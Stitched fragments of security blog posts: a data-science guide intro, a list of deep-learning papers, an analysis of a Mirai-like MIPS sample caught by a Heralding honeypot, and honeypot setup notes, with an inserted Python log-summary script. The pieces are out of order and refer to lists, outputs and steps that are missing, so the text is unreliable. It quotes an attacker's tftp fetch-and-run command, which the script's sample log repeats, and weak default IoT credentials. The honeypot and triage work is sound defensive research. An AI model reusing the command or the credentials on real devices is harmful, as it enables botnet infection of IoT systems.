This is the Definitive Security Data Science and Machine Learning Guide. It includes books, tutorials, presentations, blog posts, and research papers about solving security problems using data science.
Throughout this research, I came across several security related academic and professional research papers on security topics that use Deep Learning as part of their research. What follows is a list of the papers/slides/videos that I found, and these may be useful to others. If you have others that you think should be added to this list, please ping me: @jason_trost.
In a previous post, I discussed some of my experiences with Heralding, a credential-grabbing honeypot. In this post, I will briefly analyze a sample I obtained by tftp'ing it based on Heralding log entries. This sample appears to be targeted at MIPS-based systems that use very weak default creds (root:5up, Admin:5up). There are a few devices that I could find that use these creds. There are likely many more.
In my previous post I mentioned that I was not able to download a sample from the tftp commands. Well today, I was finally able to download one of the samples via tftp without it timing out.
According to 3 AVs on VirusTotal, 3f3863996071b4f32ca8f8e1bfe27a45 is Mirai, BUT the IPs performing the telnet scans only attempted 2 username/password combinations (and the Mirai source code uses many more, so this may be a new variant or something completely different).
Here are the IPs observed trying to get my honeypot to download and execute this specific sample (via “tftp -l 7up -r 7up -g 22.214.171.124”).
Switch back to the tcpdump terminal and kill it. Also, and this is very important, kill the “qemu-mips 7up” processes. The 7up sample immediately starts scanning port 23 at a high rate, so you don’t want it running very long.
As you can see from the pcap, we were able to extract a couple of IOCs:
Privacy protected so kind of a dead end.
Not privacy protected and linked with some Mirai activity (see below). Also of note is the Registrant City which is “fastflux”, kind of funny.
Searching for the registrant email, dlinchkravitz[@]gmail[.]com, turns up these blog posts:
In this post, I am just outlining some details from trying out a relatively new honeypot named Heralding, developed by the well-known Honeynet Project developer Johnny Vestergaard.
Heralding is designed simply to catch login attempts over several different protocols, along with any subsequent activity. It supports the following protocols:
Heralding logs its data as CSV when logged to files or JSON if logged via ZMQ.
Each record contains the following fields:
Local CSV file
JSON over ZMQ
These are my recommended installation steps. I usually use a Python virtualenv in order to keep the install isolated from the rest of my environment.
Running this command will start the honeypot and let you test the config you just created (the config is loaded from the current working directory, or the default config is used if none is found).
You should see output like this:
When deploying honeypots, I prefer to use supervisord to manage auto-starting, stopping and restarting the sensor across reboots and failures. So here is how I have deployed Heralding:
Check the status:
I ran just one instance of Heralding for ~10 hours and caught 3077 events (mostly login attempts), all over telnet. My raw log file can be downloaded here. Here are some stats about what this sensor saw.
After reviewing the logs more closely, it appears that all of the “enable” and “shell” usernames and “system” and “sh” passwords are not usernames/passwords at all; instead, they are commands that are attempted after the attacker logs in with one of the following sets of creds. These are well-known IoT default creds, and most of them are embedded in the Mirai scanner source code.
Another IoT-related pattern I observed was what appear to be busybox default creds being used to log in, download a payload via tftp, and execute it. Unfortunately, I have not been able to download any of the payload files yet; they all time out.
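The two observations above (post-login commands such as “enable”/“system” landing in the username/password columns, and tftp download attempts showing up the same way) are easy to miss if you only count raw username/password pairs. The following script is an added example, not part of the original post and not Heralding's own code: it reads a Heralding-style CSV auth log, splits records into real credential attempts, post-login commands and download attempts, and reports which credentials were used just before a command in the same session (i.e. the creds the attacker believed had worked). The column names in `FIELDS` are an assumption about Heralding's CSV format, and the log lines in `SAMPLE_LOG` are constructed for this example (the addresses are documentation ranges, not the IPs from the post).

```python
"""Summarise a Heralding-style CSV auth log.

Added example, not Heralding's own code. FIELDS is an assumed column
layout for Heralding's CSV auth log; adjust it if your version differs.
SAMPLE_LOG is constructed sample data, not a real capture.
"""
import csv
import io
import re
from collections import Counter, defaultdict

# Assumed Heralding CSV header (no header row is written in this sample).
FIELDS = ["timestamp", "auth_id", "session_id", "source_ip", "source_port",
          "destination_ip", "destination_port", "protocol", "username", "password"]

# Tokens the post identifies as commands sent after login, not credentials.
POST_LOGIN_COMMANDS = {"enable", "shell", "system", "sh"}
# Busybox-style download-and-execute attempts invoking tftp or wget.
DOWNLOAD_RE = re.compile(r"\b(tftp|wget)\b")

# Constructed sample log modelled on the patterns described in the post.
SAMPLE_LOG = """\
2017-03-01 10:00:01,1,s1,198.51.100.7,41000,10.0.0.5,23,telnet,root,xc3511
2017-03-01 10:00:02,2,s1,198.51.100.7,41000,10.0.0.5,23,telnet,enable,system
2017-03-01 10:00:03,3,s1,198.51.100.7,41000,10.0.0.5,23,telnet,shell,sh
2017-03-01 10:00:04,4,s2,203.0.113.9,51234,10.0.0.5,23,telnet,root,5up
2017-03-01 10:00:05,5,s2,203.0.113.9,51234,10.0.0.5,23,telnet,tftp -l 7up -r 7up -g 192.0.2.1,
2017-03-01 10:00:06,6,s3,198.51.100.7,41100,10.0.0.5,23,telnet,admin,admin
2017-03-01 10:00:07,7,s4,203.0.113.9,51300,10.0.0.5,23,telnet,root,5up
"""


def parse_records(text):
    """Parse CSV text into a list of dicts keyed by FIELDS."""
    return list(csv.DictReader(io.StringIO(text), fieldnames=FIELDS))


def classify(record):
    """Return 'download', 'command' or 'credential' for one auth record."""
    user, pw = record["username"], record["password"]
    if DOWNLOAD_RE.search(user) or DOWNLOAD_RE.search(pw):
        return "download"
    if user in POST_LOGIN_COMMANDS or pw in POST_LOGIN_COMMANDS:
        return "command"
    return "credential"


def creds_preceding_commands(records):
    """Per session, count the credential pair used just before a command
    or download attempt: these are the creds the attacker treated as valid."""
    last_cred = {}
    hits = Counter()
    seen = set()
    for r in records:  # records are assumed to be in timestamp order
        sid = r["session_id"]
        kind = classify(r)
        if kind == "credential":
            last_cred[sid] = (r["username"], r["password"])
        elif sid in last_cred and sid not in seen:
            hits[last_cred[sid]] += 1
            seen.add(sid)
    return hits


def summarise(text):
    """Build the stats a sensor owner would want from one log file."""
    records = parse_records(text)
    kinds = Counter(classify(r) for r in records)
    creds = Counter((r["username"], r["password"])
                    for r in records if classify(r) == "credential")
    sources = Counter(r["source_ip"] for r in records)
    downloads = [(r["source_ip"], r["username"] or r["password"])
                 for r in records if classify(r) == "download"]
    return {
        "total": len(records),
        "by_kind": dict(kinds),
        "top_creds": creds.most_common(3),
        "sources": dict(sources),
        "downloads": downloads,
        "creds_before_commands": creds_preceding_commands(records),
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Point the script at a real log by replacing `SAMPLE_LOG` with the file contents; the `creds_before_commands` counter is the one to watch, since a credential that is consistently followed by `enable`/`sh` or a tftp fetch is one the scanners expect to succeed on some device class.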
Malicious login attempts are very common, especially with IoT devices shipping with hardcoded credentials. Heralding makes collecting these login attempts easy, since it is a simple but effective honeypot for capturing credentials attempted over a variety of different protocols.
Heralding is implemented in Python, and because of its modular logger design it would be relatively straightforward to add MHN support for this honeypot, so if time permits I might do this.
If you want to explore the data collected by my instance of Heralding, you can download my log file here.
Lastly, consider donating to the Honeynet Project: